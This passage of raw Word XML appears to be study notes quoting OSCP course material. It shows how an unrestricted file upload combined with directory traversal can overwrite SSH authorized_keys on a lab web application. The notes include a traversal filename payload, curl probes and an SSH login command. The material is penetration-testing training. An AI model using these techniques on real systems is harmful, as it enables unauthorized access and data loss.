        <w:ind w:right="600"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1295400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="310" name="image307.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image307.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId276"/>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CEF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="761"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="600" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -i id_rsa daniela@192.168.50.244</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CF0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:right="600"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Success! </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C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2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qtt9fpevndk8" w:id="115"/>
      <w:bookmarkEnd w:id="115"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Overwriting authorized_keys file using file upload</w:t>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highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A better demonstration of how to inject our new public key into authorized_keys can be see nin the "SSH public key injection attack via authorized_keys file" section</w:t>
      </w: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t xml:space="preserve">This basically means we can upload files but we aren't able to execute those files (so we can't upload a PHP shell and then execute it). So here, they give an example of how to upload SSH's authorized_keys file in order to SSH into root</w:t>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t xml:space="preserve">From OSCP (9.3.2. Using Non-Executable Files)</w:t>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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this section, we'll examine why flaws in file uploads can have severe consequences even if there is no way for an attacker to execute the uploaded files. We may encounter scenarios where we find an unrestricted file upload mechanism but cannot exploit it. One example for this is</w:t>
      </w:r>
      <w:hyperlink r:id="rId277">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId278">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Google Drive</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, where we can upload any file, but cannot leverage it to get system access. In situations such as this, we need to leverage another vulnerability such as Directory Traversal to abuse the file upload mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CFC">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's begin to explore the updated "Mountain Desserts" web application by navigating to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://mountaindesserts.com:8000</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CFD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3060700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 18: Mountain Desserts Application on Windows" id="227" name="image217.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 18: Mountain Desserts Application on Windows" id="0" name="image217.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId279"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3060700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 18: Mountain Desserts Application on Windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CFE">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll first notice that new version of the web application still allows us to upload files. The text also reveals that this version of the application is running on Linux. Furthermore, there is no </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> link at the bottom of the page, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">index.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is missing in the URL. Let's use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to confirm whether the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">index.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> files still exist.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000CFF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ curl http://mountaindesserts.com:8000/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D00">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">404 page not found</w:t>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t xml:space="preserve">kali@kali:~$ curl http://mountaindesserts.com:8000/meteor/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D03">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">404 page not found</w:t>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t xml:space="preserve">kali@kali:~$ curl http://mountaindesserts.com:8000/admin.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D06">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">404 page not found</w:t>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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 37 - Failed attempts to access PHP files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D09">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 37 shows that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">index.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> files no longer exist in the web application. We can safely assume that the web server is no longer using PHP. Let's try to upload a text file. We'll start Burp to capture the requests and use the form on the web application to upload the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">test.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file from the previous section.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D0A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5619750" cy="1438275"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 19: Text file successfully uploaded" id="56" name="image56.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 19: Text file successfully uploaded" id="0" name="image56.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId280"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5619750" cy="1438275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 19: Text file successfully uploaded</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D0B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 19 shows that the file was successfully uploaded according to the web application's output.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D0C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When testing a file upload form, we should always determine what happens when a file is uploaded twice. If the web application indicates that the file already exists, we can use this method to brute force the contents of a web server. Alternatively, if the web application displays an error message, this may provide valuable information such as the programming language or web technologies in use.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D0D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's review the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">test.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> upload request in Burp. We'll select the POST request in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP history</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, send it to Repeater, and click on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Send</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D0E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2336800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 20: POST request for the file upload of test.txt in Burp" id="279" name="image287.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 20: POST request for the file upload of test.txt in Burp" id="0" name="image287.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId281"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2336800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 20: POST request for the file upload of test.txt in Burp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D0F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 20 shows we receive the same output as we did in the browser, without any new or valuable information. Next, let's check if the web application allows us to specify a relative path in the filename and write a file via Directory Traversal outside of the web root. We can do this by modifying the "filename" parameter in the request, so it contains </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../../../../../../../test.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, then click </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">send</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D10">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2400300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 21: Relative path in filename to upload file outside of web root" id="432" name="image435.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 21: Relative path in filename to upload file outside of web root" id="0" name="image435.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId282"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2400300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 21: Relative path in filename to upload file outside of web root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D11">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Response</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> area shows us that the output includes the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sequences. Unfortunately, we have no way of knowing if the relative path was used for placing the file. It's possible that the web application's response merely echoed our filename and sanitized it internally. For now, let's assume the relative path was used for placing the file, since we cannot find any other attack vector. If our assumption is correct, we can try to blindly overwrite files, which may lead us to system access. We should be aware, that blindly overwriting files in a real-life penetration test could result in lost data or costly downtime of a production system. Before moving forward, let's briefly review web server accounts and permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D12">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Web applications using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nginx</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or other dedicated web servers often run with specific users, such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">www-data</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on Linux. Traditionally on Windows, the IIS web server runs as a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Service</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> account, a passwordless built-in Windows identity with low privileges. Starting with IIS version 7.5, Microsoft introduced the</w:t>
      </w:r>
      <w:hyperlink r:id="rId283">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId284">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">IIS Application Pool Identities</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. These are virtual accounts running web applications grouped by</w:t>
      </w:r>
      <w:hyperlink r:id="rId285">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId286">
